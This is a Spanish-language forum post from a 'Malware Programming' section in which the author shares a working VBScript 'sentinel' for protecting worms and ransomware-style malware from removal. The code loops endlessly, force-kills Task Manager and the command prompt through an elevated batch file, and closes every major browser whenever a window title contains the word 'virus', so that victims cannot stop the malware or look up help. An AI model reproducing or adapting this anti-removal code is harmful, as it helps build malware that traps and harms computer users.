Centinela VBScript - AutoDefensa para Virus y Gusanos [Malware Programming]

[John1Connor]

Buenas, hace mucho no pasaba por acá (ni por ningún foro).
Hoy les traigo un Centinela para implementar en script de vb y proteger tu malware para dificultar su eliminación.

Breve Reseña:

Cuando yo me inicie en el mundo de la programación lo hice para programar viruses, mas precisamente gusanos. Pero con el tiempo aprendí de verdad y deje las pavadas y empecé a programar software y trabajar, ahora programo videojuegos, frameworks, y motores/editores de juegos.
Hace un mes sufrí una lesión en la cervical que no me permite trabajar ni estar mucho tiempo sentado programando, por eso me puse a hacer boludeces en vbscript.
Y mientras preparaba un buen gusanito con alma de ransomware (pero inofensivo), se me ocurrió ponerle un CENTINELA.

Que seria un CENTINELA? : Un script, o una función dentro de un script que se encarga de vigilar y velar por la integridad del malware.
De que manera? :  Buscando programas abiertos que te permitan "apagar" el virus como  el Administrador de tareas, o la consola de comandos CMD y cerrándolos.
                            Buscando entre los navegadores web y dentro de las pestañas o ventanas la palabra "virus" y así impedir que busques temas relacionados con
                             antivirus, virus, marcas de antivirus, soluciones, etc.

Y aqui el codigo, sencillito y de pocas lineas, cortita y al pie...

Código (vb) [Seleccionar] Expandir


DO
SET FASO = CreateObject("Scripting.FileSystemObject")
SET YPF = WScript.CreateObject("WScript.Shell")
SET SHELL = CreateObject("Shell.Application")
YPF.Run "cmd /c echo taskkill /f /im Taskmgr.exe > %tmp%/protector.bat", 0, true
YPF.Run "cmd /c echo taskkill /f /im cmd.exe >> %tmp%/protector.bat", 0, true
SHELL.ShellExecute FASO.GetSpecialFolder(2) & "/protector.bat", , , "runas", 0
YPF.Run "cmd /c tasklist /fi ""imagename eq chrome.exe"" /fo list /v > %temp%/out.txt", 0, true
YPF.Run "cmd /c tasklist /fi ""imagename eq firefox.exe"" /fo list /v >> %temp%/out.txt", 0, true
YPF.Run "cmd /c tasklist /fi ""imagename eq opera.exe"" /fo list /v >> %temp%/out.txt", 0, true
YPF.Run "cmd /c tasklist /fi ""imagename eq safari.exe"" /fo list /v >> %temp%/out.txt", 0, true
YPF.Run "cmd /c tasklist /fi ""imagename eq iexplore.exe"" /fo list /v >> %temp%/out.txt", 0, true
YPF.Run "cmd /c tasklist /fi ""imagename eq microsoftedge.exe"" /fo list /v >> %temp%/out.txt", 0, true
WScript.Sleep 100
SET ARCHIVO = FASO.OpenTextFile(FASO.GetSpecialFolder(2) & "/out.txt", 1)
IF InStr(lCase(ARCHIVO.ReadAll), "virus") > 0 THEN
YPF.Run "taskkill /f /im chrome.exe", 0, True
YPF.Run "taskkill /f /im firefox.exe", 0, True
YPF.Run "taskkill /f /im opera.exe", 0, True
YPF.Run "taskkill /f /im safari.exe", 0, True
YPF.Run "taskkill /f /im iexplore.exe", 0, True
YPF.Run "taskkill /f /im microsoftedge.exe", 0, True
END IF
WScript.Sleep 100
LOOP

REM        Centinela VBScript  - Powered by JohnConnor (L) 2021



Saludos!